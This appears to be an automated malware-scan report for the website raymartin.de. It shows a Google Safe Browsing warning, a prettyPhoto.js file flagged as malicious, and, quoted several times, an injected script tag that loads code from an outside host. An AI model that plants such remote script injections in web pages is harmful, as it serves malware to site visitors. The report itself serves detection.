Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=raymartin.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.raymartin.de/ | 200 OK Content-Length: 8106 Content-Type: text/html | clean |
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://www.raymartin.de/./assets/prettyphoto.js | 200 OK Content-Length: 30312 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.prettyPhoto = {version: '2.5.6'}; $.fn.prettyPhoto = function(settings) { settings = jQuery.extend({ animationSpeed: 'normal', opacity: 0.80, showTitle: true, allowresize: true, default_width: 500, default_height: 344, counter_separator_label: '/', theme: 'light_rounded', hideflash: false, wmode: 'transparent', autoplay: true, modal: false, changepicturecall Antivirus reports:
| ||
http://www.raymartin.de/./orchester/index.php | 200 OK Content-Length: 10582 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://ftp.csofcl.com/apXuC6iA.php?id=18649947" type="text/javascript"></script> | ||
http://www.raymartin.de/./orchester/../assets/prettyphoto.js | 200 OK Content-Length: 30312 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.prettyPhoto = {version: '2.5.6'}; $.fn.prettyPhoto = function(settings) { settings = jQuery.extend({ animationSpeed: 'normal', opacity: 0.80, showTitle: true, allowresize: true, default_width: 500, default_height: 344, counter_separator_label: '/', theme: 'light_rounded', hideflash: false, wmode: 'transparent', autoplay: true, modal: false, changepicturecall Antivirus reports:
| ||
http://www.raymartin.de/./orchester/./index.php | 200 OK Content-Length: 10582 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://ftp.csofcl.com/apXuC6iA.php?id=18649947" type="text/javascript"></script> | ||
http://www.raymartin.de/./orchester/./../assets/prettyphoto.js | 200 OK Content-Length: 30312 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.prettyPhoto = {version: '2.5.6'}; $.fn.prettyPhoto = function(settings) { settings = jQuery.extend({ animationSpeed: 'normal', opacity: 0.80, showTitle: true, allowresize: true, default_width: 500, default_height: 344, counter_separator_label: '/', theme: 'light_rounded', hideflash: false, wmode: 'transparent', autoplay: true, modal: false, changepicturecall Antivirus reports:
| ||
http://www.raymartin.de/./orchester/././index.php | 200 OK Content-Length: 10582 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://ftp.csofcl.com/apXuC6iA.php?id=18649947" type="text/javascript"></script> | ||
http://www.raymartin.de/./orchester/././../assets/prettyphoto.js | 200 OK Content-Length: 30312 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.prettyPhoto = {version: '2.5.6'}; $.fn.prettyPhoto = function(settings) { settings = jQuery.extend({ animationSpeed: 'normal', opacity: 0.80, showTitle: true, allowresize: true, default_width: 500, default_height: 344, counter_separator_label: '/', theme: 'light_rounded', hideflash: false, wmode: 'transparent', autoplay: true, modal: false, changepicturecall Antivirus reports:
| ||
http://www.raymartin.de/./orchester/./././index.php | 200 OK Content-Length: 10582 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://ftp.csofcl.com/apXuC6iA.php?id=18649947" type="text/javascript"></script> | ||
http://www.raymartin.de/./orchester/./././../assets/prettyphoto.js | 200 OK Content-Length: 30312 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.prettyPhoto = {version: '2.5.6'}; $.fn.prettyPhoto = function(settings) { settings = jQuery.extend({ animationSpeed: 'normal', opacity: 0.80, showTitle: true, allowresize: true, default_width: 500, default_height: 344, counter_separator_label: '/', theme: 'light_rounded', hideflash: false, wmode: 'transparent', autoplay: true, modal: false, changepicturecall Antivirus reports:
| ||
http://www.raymartin.de/./orchester/././././index.php | 200 OK Content-Length: 10582 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://ftp.csofcl.com/apXuC6iA.php?id=18649947" type="text/javascript"></script> | ||
http://www.raymartin.de/./orchester/././././../assets/prettyphoto.js | 200 OK Content-Length: 30312 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.prettyPhoto = {version: '2.5.6'}; $.fn.prettyPhoto = function(settings) { settings = jQuery.extend({ animationSpeed: 'normal', opacity: 0.80, showTitle: true, allowresize: true, default_width: 500, default_height: 344, counter_separator_label: '/', theme: 'light_rounded', hideflash: false, wmode: 'transparent', autoplay: true, modal: false, changepicturecall Antivirus reports:
| ||
http://www.raymartin.de/./orchester/./././././index.php | 200 OK Content-Length: 10582 Content-Type: text/html | suspicious |
Suspicious code found <script src="http://ftp.csofcl.com/apXuC6iA.php?id=18649947" type="text/javascript"></script> | ||
http://www.raymartin.de/./orchester/./././././../assets/prettyphoto.js | 200 OK Content-Length: 30312 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.prettyPhoto = {version: '2.5.6'}; $.fn.prettyPhoto = function(settings) { settings = jQuery.extend({ animationSpeed: 'normal', opacity: 0.80, showTitle: true, allowresize: true, default_width: 500, default_height: 344, counter_separator_label: '/', theme: 'light_rounded', hideflash: false, wmode: 'transparent', autoplay: true, modal: false, changepicturecall Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: raymartin.de
Result:
GET / HTTP/1.1
Host: raymartin.de
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: raymartin.de
Referer: http://www.google.com/search?q=raymartin.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: raymartin.de
Referer: http://www.google.com/search?q=raymartin.de
Result:
The result is similar to the first query. There are no suspicious redirects found.